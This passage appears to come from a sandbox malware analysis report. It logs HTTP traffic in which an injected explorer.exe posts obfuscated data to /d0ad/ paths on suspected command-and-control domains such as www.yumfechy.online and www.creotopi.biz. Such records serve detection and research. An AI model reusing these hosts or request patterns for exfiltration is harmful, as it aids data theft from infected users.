MnXLBMhTYVC-RzfNC-Y7a1jkJq17PSNim35vlKqePefRpZ7N3QHIW7BEN2vDnbCgIdBKXyIgVgCyeizOnZHuHLZ4VJTFUlwosvBBAd2PD3Tp0LRxmYARKAeXQRraYziiNd4Gxn2A3aebUuM-kkw5eA62NhhAhBAdlLh4JtXugM81ut1DKOUt5EOsLvCSxzk1V2OD1D0LuMHtlZfbArhFjLzXpExCZYQrXh6gfjYrNBefCQdEYyWQFpLTqAZmFFfl1zMUIwVTIhcnpXijFTizjEuM(le2w_G5jCAzQWgrsS8-61nNO_YxIqvLsnV5BJx9mN47XjTPHnVScWeZ4OiI8JETt3koPHR5GMEPCZLNNmENXR351iJcg_s8(SJZfvvtBs~5BrRgJ-K8P6ZF(EkjA5k9aztaXfnpcsAILsqwxOMn40Oir-uIy1He02QVmKPeVIhW1j9A81iOKr0SVi4HPM3lBtbg04jXkPfodJJjQlaIBlVFR1526vHul2i2fMuIwv00hqp4hCA0Ln1TMBMrDfNbSKRHFj5kurxVRPvvgDuzny3KFQC2fnODWsAhFGf-Rqve01tcydLyIRycKD0TO2wtHnTci1OleQ0DDQ9q4KuiehJ7KOn2AA(tLxZxdbgxq0~WjUwXYnhKoK9ub58k2O6DhHnhKRf9TyphCk(EnsYLDDntHa5P9v4qEA7Nq7jBSZH0eNXnjH4WRIdQd_08Ohxcj_YX2WiVxMStMoIQYdv6v-zm(eaX9G7mf_IhkmOiPFg-6245Mqajwvt3aMKp4KUEEQT10viJGhN1F6Pme-ZV8vP0YKv5(ISwL-1uescJHKHElz5niiddTI1_XKVhOF8qtF3xWLhZIKczHyCiLF9v1VQv23FwhBKhKYP8iYsBjPCo6NWYhfQa7exdHjF4EoCd~tmC3PYowDKq(RskEhKvPNqeZ61kyBxCIseK3jTaAQfWMqIjhnLV9OMVcHNHbjU3K-CCDuJY6i3IBQp3xwQdhgGtuZNmm0HSrkg6rkaU7-5ROkYpOPqYQY(-GCShMcAJOBdMCPEKRZpxxH8E49hDV9GcYwFY2PnderDTPj0-iGcZlQ0VWxljnP42aB(9UrqanM1td_jei3H7efZ3tTOKLIAh01IQ2dhDAKL7ePnJKrGw9OePbP7ldZfdmuzjwtfJsPuj0EEAjkMhc2fkJERA8BU9vbIpgplHLz2M3bcR(Ee4ISWZecxIkaP2VbxZE6~tGJhN733zYdT4jv3puEuDabonQd3GjtAk8YHjXpYD~r3aVscVbEj8Gg3xI0iMN3lyCuuQkoZvkHE6LBE-5K~XTk2apaeumo87oBQAOlrcTVgbcZI30pC4SJjh8FvdGqD2PATZehWQrx~Q(sDq6v(YmDO7KhZUbGRfZV2vnpSXi3sj1eD9JDDJQkruZ4kLp3MhbT4F(dPBJcAOa2J9Yee8c39kzBloGPmvN5h2dJRnEJE7nGD0uf3jQa7XppmRozqGA51p5o0pTiY9osrAqPuATYKxLgNaPY4nTo(OPGg8MlG1XvVfpCVfkOy4YzLOQ8ObKnWBsHQHUmnOx6HKUBv49VXqERFqCeFThSuumQiTCVkYmQsWKoXahQxiZfpq0TiffaEDGRZRgRqSUbG2q6nsbKiwEvOMpOretijkv4lvckbRBiE00CeBHWpoEJQVjYUtT1a2ZNbTjTm4W7h8xjG6CnJ8sazq28lJ(QGJPoXwMFlE1dWmF3jqWFy8vQEEbunOXADDk6zolR9OrL0GZP4jNtNHzM60But3(rLNS-3LMdZ5hS~Vg-cwqH6R7Wq6R9hXNeluHrnj6xWyjb3P9dVygpS66gRTStBB32FREMCzZW1AX3xDKqzKiObLWb2zzFJSnSEK5aKF2mmaT8ydx6O-Gtxqn4NkJp1wrIRRfq52tZHJ9spQmvuF0vtuYpHMeOtRmOpTUWNkM_MNpzagvEijQp851VS5H8x0y-Sy6-F6Ru~aXLG_7QyHRTN95zlky3YjQFbEHT8fIYicwmzDQfkoyCZjQbPVQc7a1KUv6yEqsgNp22dbrV9XnO29j7hTpGD2odwqWunl8oldhfR1eIfe(36r9mcFZeAlhArB0s5DeiYoXvM9y3p6SXdWKkgkxFuH80~dlCt8Tok0V6im088x6shfUn3zUdjJnsxLB1fDJjWJ(XihAh3YJoQbQK2UA_28614D4htP~vRefuenLFo0dniiDiHV(CGFYKEEnY4weopuPwqFVaxyOK86sBX9YyEhiiOBjcfS6D~nsg1daKxcZh6BH-BGFg2X1fh9i4UnBbmfkp61JFc90Pol9VUBD_x0nCylpb67hqQy~YIGAdqcBRrVmgUIBbkYIv9fLwGyI4xRIb8clo6DfdM9NEA0Ai6c9jx8mUDfYp5Z(1Ep~VrAcFLfK6ZQQkBz2YyU8TlD(_Q626uIRMDWGaiO4TgWNX9XD_JYBGdo93XmJAo7zfOh0SCAi1XR(VRKthXxNHL1S3SR6YEozfAsjVR53z4IF_dh4K(quEQ1cFjN2X5oJuwyEeB6lL5gF7CoTTVNjIfl9cUDgONshBZYKUOpNcMIKXszXNUQty2QD_vrNe3QEySyIcWBgCV-L2DQdyeZ8oHRRr5zwGhspK4WacV9ZUOhTRf1qV(ik03d(09FGlTv5o0P4mcPEZbwWrnr04YINP7kVnrG2ew8RGLZLyR4Y9Nei30sycwqLXLGwCYBP_Q25H6gdpnsdczE16hWLVeuO93USCeWOPE19HwiyRqqVJGhnwnG~nSucbV1OLuJQf9-rcBu85T9ibIznMBycSuhzac11s2pCr(GlYFgOgCXoIghUiVtBLW_0pndhqGNcbp5uzvBpmdapuY2S1mIoaZfA5rQ4Ivouy(u0H9xWuxF(TMkWkgFfb04HncuUoHfhrY0pvc67SN14ov50FOlX9PkX6akOMYLsH3ekPTrIHc54R4xtiQMyeriOHG8qQEiSkExClw9Z4oEbL
Oct 26, 2022 13:21:48.718020916 CEST	2336	OUT	Data Raw: 44 43 55 54 52 76 28 67 71 32 66 48 67 43 71 30 43 56 77 5a 77 33 51 76 42 63 6e 5a 58 72 4a 6c 52 44 54 4e 69 67 6c 6a 47 50 62 64 37 67 65 36 75 56 4c 37 7a 32 36 45 41 64 32 43 64 61 42 74 4c 49 57 6f 6a 74 6e 39 4f 2d 5a 4c 47 71 48 4a 63 66 Data Ascii: DCUTRv(gq2fHgCq0CVwZw3QvBcnZXrJlRDTNigljGPbd7ge6uVL7z26EAd2CdaBtLIWojtn9O-ZLGqHJcfNiNiUiHJcRIya99s8qcCIrUTzkPX7VHgrNCK6QhFICfNfxWDEBN6lv9FryVWBE72FkxbUbU1Zz1GONykWxljfke1BIW9tcJ8LMZAzzAQ2FWpE939H-f-2u(eSpRjvt8v1spIYRZnViyi0LqjJ9CbutpIPrqpaWUQd
Oct 26, 2022 13:21:48.914589882 CEST	2338	OUT	Data Raw: 38 73 68 30 73 36 63 76 38 70 50 76 72 50 61 79 58 36 45 4b 36 52 6d 53 39 48 5a 67 59 62 50 43 72 6c 38 41 57 67 33 4f 46 55 55 5f 51 77 62 71 77 73 35 4f 37 67 4c 76 47 73 71 50 4d 44 57 37 4c 43 65 46 31 42 32 65 38 5f 41 79 47 69 44 2d 4f 50 Data Ascii: 8sh0s6cv8pPvrPayX6EK6RmS9HZgYbPCrl8AWg3OFUU_Qwbqws5O7gLvGsqPMDW7LCeF1B2e8_AyGiD-OPSk9utFL-cMloISPc6BZ5Ukyxxe7LUIUkbkpK0t6EHKBPmtqQERLZbVqZFg0NcpUD7Re3NllwMb5V3Xj-f4XGcdM_sYDbQK9JM8~4Rt6iT7vB2-bNgSKvkpoFR194A9ohtWpGuPhYbWAnwy7psGB6akL4DKFnDkpor
Oct 26, 2022 13:21:48.914689064 CEST	2341	OUT	Data Raw: 7e 52 64 34 36 38 71 67 48 78 67 4a 70 31 4a 71 70 71 44 33 34 51 52 6a 37 76 62 7a 59 71 61 52 64 4e 4d 74 6e 37 46 74 30 57 59 6c 48 43 57 34 47 76 59 71 72 79 46 7a 42 53 41 36 74 73 57 57 33 5f 34 39 30 64 64 32 43 6a 34 61 47 30 4b 6a 71 51 Data Ascii: ~Rd468qgHxgJp1JqpqD34QRj7vbzYqaRdNMtn7Ft0WYlHCW4GvYqryFzBSA6tsWW3_490dd2Cj4aG0KjqQnubCW0oougm7zwUP00e7QoAgRAONRWPp8v4KZ3FGePOPV_AfzCqHPSVHVCrqQPXWC3FfDsP2IJ(Caau5Pcujb7IJg6LLvgWnbGpSfOe9eCYshWehVl(tgZM1sfP4e3rf9vHJFKJPNF4baQxUlI21A89nQSyDtsLXn
Oct 26, 2022 13:21:48.914920092 CEST	2346	OUT	Data Raw: 48 4f 48 50 37 59 70 50 7e 69 56 7a 32 46 71 72 45 66 70 6e 6f 36 57 39 37 7a 37 65 54 65 4e 68 30 4f 4b 31 43 49 54 64 71 69 37 42 4e 4c 48 65 33 6c 77 6f 6e 56 38 77 74 54 43 30 65 49 54 41 76 69 4c 47 34 33 44 65 58 5f 58 5a 77 78 72 6f 54 4e Data Ascii: HOHP7YpP~iVz2FqrEfpno6W97z7eTeNh0OK1CITdqi7BNLHe3lwonV8wtTC0eITAviLG43DeX_XZwxroTNgtzZWoAW8UPyqiNOfd25nBC1SueyeS59WhppOamGFnwZtq3Il6B4Iar-tZTV9UOQMZ65n0qY6IhtN3i6WYM8Emi8NW4khyEMOm9pv-6oMz1ojOtY5FOKJHhORBcYGqc74n(tZQrutlip8cqT21dVYOISd9CURhA8(
Oct 26, 2022 13:21:48.915055037 CEST	2352	OUT	Data Raw: 49 39 76 4e 70 35 48 62 36 34 42 71 45 77 45 47 30 58 44 78 76 48 4c 42 30 51 4c 4e 75 68 36 43 50 56 44 6a 67 65 7e 2d 43 4e 48 72 59 34 6c 6f 53 57 65 67 71 62 48 7a 64 69 54 32 4f 64 44 30 31 73 41 33 56 31 73 52 39 59 79 6c 52 63 43 67 6e 6a Data Ascii: I9vNp5Hb64BqEwEG0XDxvHLB0QLNuh6CPVDjge~-CNHrY4loSWegqbHzdiT2OdD01sA3V1sR9YylRcCgnjxxZUqgNjkjxRKRxfRMxjvNh3oqORm3Zl6sKr3FIpgxMC6mEzJGDtdZlc3VOkcuoYeQnVfHxa9YyPXfdllM7-7JWc5cInKUO_2OlhP2gQI8r-4L8erL~wxTtdMGRDetVjRDwFYLvSC67M81MQZnFn1oy4bFc-3CNWP
Oct 26, 2022 13:21:48.915262938 CEST	2359	OUT	Data Raw: 44 51 36 42 5a 47 48 5a 49 35 38 5a 32 4e 6e 42 70 70 72 71 7a 35 52 58 43 41 47 45 72 39 31 53 67 57 32 4b 56 7a 62 77 50 5a 42 70 76 64 63 69 34 65 58 45 6e 69 68 47 6b 55 67 68 64 45 62 63 32 51 65 54 32 57 4d 67 6c 5a 77 31 63 73 6a 6e 43 6c Data Ascii: DQ6BZGHZI58Z2NnBpprqz5RXCAGEr91SgW2KVzbwPZBpvdci4eXEnihGkUghdEbc2QeT2WMglZw1csjnCl5bG8CivFRZlNi5WIB5KwxqciodePIrBKjs4KgTXKbV3YyUFmyFnG5yxbEKgatFnBawJFsz3EVuiGEFt5EWLUuKvQO0PWzOIBtmnkHvgapLIpZgZmsGkTdfSvVk1Dm5Qq9dLsNGv7XW3Gqc7t3CilgbDaGP4Qyj1iU
Oct 26, 2022 13:21:48.915386915 CEST	2362	OUT	Data Raw: 53 6d 70 64 6f 51 66 53 35 51 61 4a 74 63 34 35 48 5a 48 30 6e 75 65 6a 76 45 33 37 36 4e 67 4a 52 71 28 45 36 34 49 6c 55 5a 4a 49 39 75 72 77 46 76 36 79 48 59 53 78 4d 38 34 6a 49 5f 6c 79 78 71 4a 5a 38 48 72 48 78 56 28 33 75 55 61 75 48 7a Data Ascii: SmpdoQfS5QaJtc45HZH0nuejvE376NgJRq(E64IlUZJI9urwFv6yHYSxM84jI_lyxqJZ8HrHxV(3uUauHzH5PHLqG_HWhYDtFsEDRNI7TftzKllAzur2ub4ANAEjD225TwMbHBCPkK32W5u4VGgg47pY7_Z53mcORJn3vOb9WUpLZnir9QFbqsJ_RS5qXWeFWMQ7Tr8hyi0xgjl2SvXkOHxD7BsGvAKgsBGrzPGK6MDwuMe2X8n
Oct 26, 2022 13:21:49.111171961 CEST	2364	OUT	Data Raw: 66 30 6f 49 43 69 67 46 44 4f 59 74 35 47 55 54 43 62 56 73 68 6d 51 77 7a 30 6a 4a 57 66 31 76 57 69 72 66 58 51 62 36 67 5f 58 76 35 59 42 32 79 45 7e 33 35 54 33 45 77 58 70 45 66 63 4e 6d 6d 43 63 6f 78 4d 41 7a 76 31 37 42 44 48 5a 32 43 4a Data Ascii: f0oICigFDOYt5GUTCbVshmQwz0jJWf1vWirfXQb6g_Xv5YB2yE~35T3EwXpEfcNmmCcoxMAzv17BDHZ2CJA7lSvCpYdw3AbAwQFPKxxkTU7SuMU9WPUL4fOmfGx2A0KEjQg0HsVh7t~Z8BRo~ngqejDidA0Vb0mbTJ5iHI7_3erSTB69U19yclSm~Q7Ncyk9iicPUcWFXcF58_Hnzwjlj3uUNtXcUuBLnav_JGqohlkkplW6pR6
Oct 26, 2022 13:21:49.111339092 CEST	2367	OUT	Data Raw: 38 67 49 33 42 37 57 63 51 4d 46 56 4c 69 53 72 47 58 6d 4e 4f 79 76 56 6c 74 74 32 6e 55 38 51 62 33 79 58 69 79 39 4e 31 38 6e 42 66 78 57 4d 71 39 34 6d 4c 6c 41 47 49 58 48 37 49 4b 74 67 35 59 55 69 63 59 4b 36 42 56 72 4b 38 66 66 75 6a 33 Data Ascii: 8gI3B7WcQMFVLiSrGXmNOyvVltt2nU8Qb3yXiy9N18nBfxWMq94mLlAGIXH7IKtg5YUicYK6BVrK8ffuj3T7mPpfclcP8fD442Op7ubQ2b0kaFKTNm0RaYCJD_bo(XVLRhJLZWHGgR6GO0YwmaFu(i83jrlnu2gUs0Aise(Oq06z62FX4xCVDguBfPEw7BNHwcgJODjR23bzhgq0AAY_6sVHXq0qUoCBNGRD7I59tbN6vcrVpcW
Oct 26, 2022 13:21:49.111514091 CEST	2372	OUT	Data Raw: 49 76 4b 4d 76 44 52 78 6a 6d 4d 79 65 31 30 31 4d 38 71 49 63 31 65 78 49 63 33 65 4e 51 53 74 76 46 44 52 76 4f 6d 4d 70 56 56 44 58 57 62 69 58 6a 37 64 66 51 4a 7a 6f 69 43 41 53 35 6e 61 55 5a 65 35 4c 77 54 57 65 57 44 39 41 4c 77 74 5a 6b Data Ascii: IvKMvDRxjmMye101M8qIc1exIc3eNQStvFDRvOmMpVVDXWbiXj7dfQJzoiCAS5naUZe5LwTWeWD9ALwtZkKMFgqLHcfhJWDJeyyKq5(BiT(gMzAIh0Yav9(MX5KAtQjDxy~bKnOFnKyaoMpiCbsoK-WbB6rQj_lbMpC1iZ7A5DcUIb2UAA4_YlS5DysFou3PB2wv7qEEJ4wocxyvB8jLLClal_RKeB~bXWm49Zcp6qwB~rET29R
Oct 26, 2022 13:21:49.308793068 CEST	2377	IN	HTTP/1.1 302 Found Date: Wed, 26 Oct 2022 11:21:48 GMT Server: Apache Location: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 72 65 6f 74 6f 70 69 2e 62 69 7a 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.creotopi.biz/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	192.168.11.20	49963	162.214.80.106	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:50.931993008 CEST	2377	OUT	GET /d0ad/?hZ=5jUpdPs&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H+fn1MAfyMOe8tpEzipk9UZUSo3gyKb1yEBNApLz6gZQFbalc5fPAhgkZeVbYS3Sjg== HTTP/1.1 Host: www.creotopi.biz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:21:51.146051884 CEST	2378	IN	HTTP/1.1 302 Found Date: Wed, 26 Oct 2022 11:21:49 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=iso-8859-1 Content-Length: 353 Location: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?hZ=5jUpdPs&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H+fn1MAfyMOe8tpEzipk9UZUSo3gyKb1yEBNApLz6gZQFbalc5fPAhgkZeVbYS3Sjg== X-Server-Cache: true X-Proxy-Cache: MISS Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 72 65 6f 74 6f 70 69 2e 62 69 7a 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 3f 68 5a 3d 35 6a 55 70 64 50 73 26 61 6d 70 3b 6a 58 75 3d 34 39 6f 6c 7a 42 72 45 6b 51 32 36 54 70 2f 57 48 4d 49 50 44 4a 54 76 36 6d 62 6b 38 47 63 38 48 2b 66 6e 31 4d 41 66 79 4d 4f 65 38 74 70 45 7a 69 70 6b 39 55 5a 55 53 6f 33 67 79 4b 62 31 79 45 42 4e 41 70 4c 7a 36 67 5a 51 46 62 61 6c 63 35 66 50 41 68 67 6b 5a 65 56 62 59 53 33 53 6a 67 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?hZ=5jUpdPs&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H+fn1MAfyMOe8tpEzipk9UZUSo3gyKb1yEBNApLz6gZQFbalc5fPAhgkZeVbYS3Sjg==">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.11.20	49856	162.0.238.95	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:16.594966888 CEST	452	OUT	POST /d0ad/ HTTP/1.1 Host: www.yumfechy.online Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.yumfechy.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.yumfechy.online/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 71 71 4a 4b 6e 6e 72 32 4f 37 72 63 56 48 4c 41 30 57 4d 68 63 56 6d 6e 53 62 77 64 63 32 64 4b 5a 49 39 54 4c 34 34 69 4e 30 35 37 50 36 30 70 4a 32 71 54 70 39 6e 50 5a 70 61 43 66 34 32 67 78 75 55 44 4b 66 64 4d 6f 37 28 73 53 42 48 38 6a 44 70 31 39 5f 59 37 31 6c 42 52 39 37 76 32 71 52 36 4a 51 41 28 75 76 54 39 74 39 39 67 77 43 51 66 30 6f 75 59 54 4a 38 6d 77 35 63 78 36 75 32 4b 56 78 51 63 52 71 74 76 65 31 6d 6b 56 6c 75 70 48 74 50 61 37 76 44 72 54 62 59 43 77 6c 43 64 70 58 44 46 61 68 44 77 76 41 32 73 52 59 76 47 6e 47 65 67 76 34 4a 37 54 6b 37 30 32 6c 65 55 49 39 35 4a 61 52 76 6d 42 4c 34 45 34 31 43 31 56 50 34 76 30 70 71 33 44 70 57 71 55 55 6a 6e 69 7a 36 45 35 42 50 4f 5a 31 4c 58 53 35 73 36 44 73 4a 28 76 44 30 71 61 4a 39 78 38 41 4b 69 4d 70 64 64 51 55 71 55 78 6b 46 46 33 52 66 4c 32 47 33 73 6c 6d 39 61 66 50 48 32 71 36 6c 35 6c 31 4b 54 6a 37 63 44 4a 4a 4d 39 6d 48 2d 65 4e 66 72 39 56 76 4e 36 6a 34 64 37 43 44 67 32 6e 4c 53 6f 51 54 66 69 30 6d 41 76 42 4c 45 67 6f 4a 65 47 51 65 51 4e 4a 33 6e 39 4f 4f 5f 50 6f 59 6d 5a 4c 62 51 4d 6b 65 69 4e 2d 77 5a 33 2d 6f 62 4f 6f 28 4c 37 45 66 78 30 52 67 6e 4f 6a 44 4d 54 32 37 70 65 30 4d 58 58 4e 49 6f 34 46 70 52 64 6b 71 52 38 47 58 6f 63 62 28 31 35 38 61 69 51 55 79 78 55 4e 67 52 47 75 68 58 6b 5f 6e 31 42 2d 59 61 36 35 75 39 4e 46 34 45 56 4c 36 4f 6d 2d 35 58 41 54 78 34 32 65 55 44 55 37 69 30 43 32 68 32 4b 66 54 68 72 4d 59 64 45 56 6e 61 32 4c 58 75 63 49 44 78 74 64 68 66 54 49 59 4a 6b 4e 62 70 28 43 62 48 54 34 4d 45 74 6b 65 6d 66 30 63 63 72 67 44 4e 4b 43 6a 45 35 54 6b 49 6a 44 35 6d 52 58 28 47 72 67 34 50 4c 68 33 56 4d 6e 38 5f 75 37 6e 79 55 6c 39 68 38 6e 64 62 6f 45 64 61 6f 74 68 6f 47 77 49 5f 31 75 33 37 64 44 35 59 70 66 79 6e 4e 59 73 72 31 74 68 79 55 36 64 4f 42 4a 31 32 4c 56 4a 42 67 43 6d 36 30 33 49 4f 67 45 71 70 56 44 69 62 54 35 6b 59 38 65 37 4e 5a 4f 65 53 33 5a 30 6b 28 50 4e 52 39 51 69 69 52 32 39 54 78 63 50 69 70 72 4d 4c 68 78 4b 4b 53 56 63 65 75 6a 38 72 31 78 79 4d 67 70 54 6a 72 73 47 50 56 68 36 74 39 77 74 38 32 43 33 56 45 58 44 54 46 53 5a 44 6e 75 6f 56 77 6a 52 61 62 6d 4f 70 6e 78 77 47 7a 6c 6b 31 64 68 4c 4d 6d 62 31 6a 30 53 72 58 33 6c 6c 46 75 53 79 74 44 51 39 51 38 66 77 4f 50 4c 4b 4b 47 31 34 77 6f 78 50 31 63 37 41 5a 57 38 61 35 45 70 46 6a 47 45 4f 71 43 4f 47 73 62 33 66 61 6c 33 31 38 75 7a 61 35 79 4b 28 35 7e 4b 65 6e 54 69 5a 48 71 6e 79 42 51 70 65 5a 50 50 74 5a 72 6a 53 59 36 76 6b 63 4e 73 4b 30 55 75 39 33 4b 56 33 5f 69 4d 36 35 6f 6a 42 53 46 58 46 35 45 31 49 4c 78 74 41 38 31 41 6f 4e 68 6a 6f 49 4d 4c 52 51 4c 49 61 4f 55 Data Ascii: jXu=qqJKnnr2O7rcVHLA0WMhcVmnSbwdc2dKZI9TL44iN057P60pJ2qTp9nPZpaCf42gxuUDKfdMo7(sSBH8jDp19_Y71lBR97v2qR6JQA(uvT9t99gwCQf0ouYTJ8mw5cx6u2KVxQcRqtve1mkVlupHtPa7vDrTbYCwlCdpXDFahDwvA2sRYvGnGegv4J7Tk702leUI95JaRvmBL4E41C1VP4v0pq3DpWqUUjniz6E5BPOZ1LXS5s6DsJ(vD0qaJ9x8AKiMpddQUqUxkFF3RfL2G3slm9afPH2q6l5l1KTj7cDJJM9mH-eNfr9VvN6j4d7CDg2nLSoQTfi0mAvBLEgoJeGQeQNJ3n9OO_PoYmZLbQMkeiN-wZ3-obOo(L7Efx0RgnOjDMT27pe0MXXNIo4FpRdkqR8GXocb(158aiQUyxUNgRGuhXk_n1B-Ya65u9NF4EVL6Om-5XATx42eUDU7i0C2h2KfThrMYdEVna2LXucIDxtdhfTIYJkNbp(CbHT4MEtkemf0ccrgDNKCjE5TkIjD5mRX(Grg4PLh3VMn8_u7nyUl9h8ndboEdaothoGwI_1u37dD5YpfynNYsr1thyU6dOBJ12LVJBgCm603IOgEqpVDibT5kY8e7NZOeS3Z0k(PNR9QiiR29TxcPiprMLhxKKSVceuj8r1xyMgpTjrsGPVh6t9wt82C3VEXDTFSZDnuoVwjRabmOpnxwGzlk1dhLMmb1j0SrX3llFuSytDQ9Q8fwOPLKKG14woxP1c7AZW8a5EpFjGEOqCOGsb3fal318uza5yK(5~KenTiZHqnyBQpeZPPtZrjSY6vkcNsK0Uu93KV3_iM65ojBSFXF5E1ILxtA81AoNhjoIMLRQLIaOU
Oct 26, 2022 13:16:16.595016956 CEST	457	OUT	Data Raw: 68 66 42 6f 7a 59 6e 28 44 42 37 38 77 33 72 69 6e 35 5a 6c 7a 70 42 37 44 47 4c 78 7a 4d 45 4e 7a 4f 55 32 5f 7e 6d 63 49 31 66 4c 38 31 49 56 2d 4b 66 55 63 43 75 72 4d 73 31 32 6c 58 46 53 52 39 4f 71 69 28 6e 63 37 56 4b 34 74 74 2d 42 53 61 Data Ascii: hfBozYn(DB78w3rin5ZlzpB7DGLxzMENzOU2_~mcI1fL81IV-KfUcCurMs12lXFSR9Oqi(nc7VK4tt-BSavWF6hK66V2dmcyhlH4dfTFLj4QYsznMu3g7iNuOvBespdtG~OcmWycQIAhH4yeqqnBzOO93Id4D~XxJGjzWAYc0LcaIZHDhToi9VkFJHt8GiN0Mce0DYJCGofEk1UT_0q4-NsodRHCXdyIwTqQadVfYxZlKPIin3b
Oct 26, 2022 13:16:16.595067024 CEST	463	OUT	Data Raw: 70 6e 6e 51 59 35 64 72 6b 7e 42 6b 61 49 32 78 74 53 32 4b 64 77 36 70 52 55 5a 51 61 52 32 74 79 50 39 56 56 68 6a 44 6e 56 73 7a 73 39 46 55 46 5a 69 74 73 56 4d 4e 6a 76 6d 77 76 45 76 54 33 38 4a 35 33 70 37 53 45 79 6a 66 32 74 53 75 4e 28 Data Ascii: pnnQY5drk~BkaI2xtS2Kdw6pRUZQaR2tyP9VVhjDnVszs9FUFZitsVMNjvmwvEvT38J53p7SEyjf2tSuN(vF1wlhH6X3EHiI7wC1XMD4F6VvqQJgwEun2liSU1YE_knWjiG5dkdF0yuchcJRf2pxLZYVg5ezm6WGqz_A_iY~mkWQcMEFnGWG4HaOWQdHE4Gh_L5uzHiE4LI4zu1jB(stEln(6IpCXbd9dKw7hdNKqDYiThEUsgr
Oct 26, 2022 13:16:16.751773119 CEST	466	OUT	Data Raw: 62 6c 6a 52 66 62 47 39 77 6e 4d 6f 68 6e 76 6f 4b 54 73 31 76 77 45 58 5a 6b 44 4b 79 7a 30 47 66 38 52 39 73 75 31 69 78 6f 38 6c 79 46 66 51 4a 43 6e 36 51 63 52 51 70 75 70 32 50 71 37 63 73 72 30 4b 74 48 42 53 59 51 62 46 67 74 75 55 64 47 Data Ascii: bljRfbG9wnMohnvoKTs1vwEXZkDKyz0Gf8R9su1ixo8lyFfQJCn6QcRQpup2Pq7csr0KtHBSYQbFgtuUdGNZO(sInM8ibasUyy9dJnnYIU0uGlJk7IUlT1BIURxe3elhO5fLQOQEf0jZqPbpNgR(8kx1S1vPYOJn8Q53MO4nk53mZuZpxYXo70LSZr1OGbyKq3w84iKOelwrUDVf4jSPpNIFZf9rDbo9L9Tk_cAWt8b8jj-0sNc
Oct 26, 2022 13:16:16.751857996 CEST	468	OUT	Data Raw: 4e 63 72 63 71 47 49 33 76 71 49 36 41 6b 46 4e 6c 53 79 4a 37 45 35 64 51 43 44 45 72 77 44 36 41 65 76 58 6e 39 57 49 69 55 38 6a 4a 52 6d 33 38 64 37 6a 68 32 55 72 36 35 73 30 36 79 62 48 36 58 47 69 36 50 2d 77 6f 43 66 57 4e 77 50 4c 4e 4f Data Ascii: NcrcqGI3vqI6AkFNlSyJ7E5dQCDErwD6AevXn9WIiU8jJRm38d7jh2Ur65s06ybH6XGi6P-woCfWNwPLNObCKLXiiRg2XBHHzAvSzzMp7xmZmxsp_A4Jq44ZZw060cl0IcZcFr1ULr94Z6zOSyxQFLjPn5ouC7Tt-GBhKVOf9anFCZbH9h4H_xH3lILMh1-oPZBuH14RnG-6ZtY~rG57qa0WNfuLePoksmLrBpo9qeKRs542muJ
